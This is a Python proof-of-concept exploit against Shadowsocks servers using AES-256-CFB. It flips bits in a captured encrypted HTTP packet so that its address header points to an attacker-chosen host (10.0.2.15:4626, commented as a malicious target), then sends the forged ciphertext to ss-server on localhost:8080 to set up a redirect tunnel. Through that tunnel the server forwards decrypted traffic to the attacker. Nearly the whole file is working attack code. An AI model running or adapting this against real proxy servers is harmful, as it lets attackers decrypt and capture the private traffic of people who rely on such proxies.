#!/usr/bin/env python3
#encoding:utf8

import struct

def xor(s1,s2):
    n=len(s1)
    r=bytearray()
    for i in range(n):
        r.append(s1[i]^s2[i])
    return r

#c is a capture http packet. This packet is generated by ss-server with aes-256-cfb, password: test
#so you can run a ss-server on localhost:8080, and send this packet to it
c='9a15680f1abd4b6c4747be8ecac02f260107779df768f710a2a940dc25d2b51432f6a6d051348fc253a74d222e498034b764d721050a7bea55d6676be293a01c579b99c6030b1192fb5bc79bd40595a1bc765b1d10418382c27cd5de7b51fe8f1e1c0fd0a5606c30423db56cbe0c2d9e94a7de46c693d41198cce7c57c4fbdfd583daa3caec2851a39e11c836da268008b3fae7bc945d70a380cc2293d9a9bb4941c9392c9284b56e78aa5c9c80c40460f742a11d5024ce6c9057e213812c4b62028eebbfbd89889ae08433fcfcf450834fede545af170e8d6c1fb81340fed6225c173b5eb90dbc01802b8ff35bccc161fe6e658a8add20915c6faa432f7355c88b089e11bd879dc8d7fb4cb0fbc00c4843e16dd8115181a1213ebd23af2140c8f98c02bc59529dba76637ba4ccc1e1d9d4b919ce3b06321b9e0bba06c230973197a2665afc4e1372675435ba68314733aabe925428073e9fa3690d23f53872040300e9405e9d9d1e8c339083c63f8bff65bc83e580eba7c06b175522981f39ffcfaec07c5986e4cf6cbcac5124b5ab737473cfb0d83aef4ae631dd428891984ce94932f34bc77e78dcbf05540b573a5eb17c7db4ff9088fa2235f2a130b92e74748a16e6033f583e7cabd17385836cf5560d208c4deeac34c7dfc7e3d57d2472d1c21e81c2709e2fe84a08f033d91095d0cb5cb24137e2a9603460ba36b0a82d2de33e42975fbb238fc9a8a2b4c87770027ca5bea43afe4df4d16c4e627446d'
c=bytearray.fromhex(c)

def ip_port2hex(ip_port):
    ip_str, port = ip_port.split(':') 
    ip = list(map(int, ip_str.split('.')))
    return struct.pack(">BBBBBH", 1, ip[0], ip[1], ip[2], ip[3], 4626)

def main():
    prefix='HTTP/1.'.encode('ascii')
    target_machine='10.0.2.15:4626'# malicous target IP address
    target=ip_port2hex(target_machine)
    print("target:", target, len(target))
    x=xor(prefix,target)
    y=c[16:16+7]
    z=xor(x,y)
    cipertext=c[0:16]+z+c[16+7:]
    import socket
    obj = socket.socket()
    print ("begin\n")
    obj.connect(('localhost',8080))# ss-server is running on 127.0.0.1:8080
    obj.send(cipertext)# send the payload to construct a redirect tunnel
    buf=obj.recv(1024)

if __name__ == '__main__':
    main()
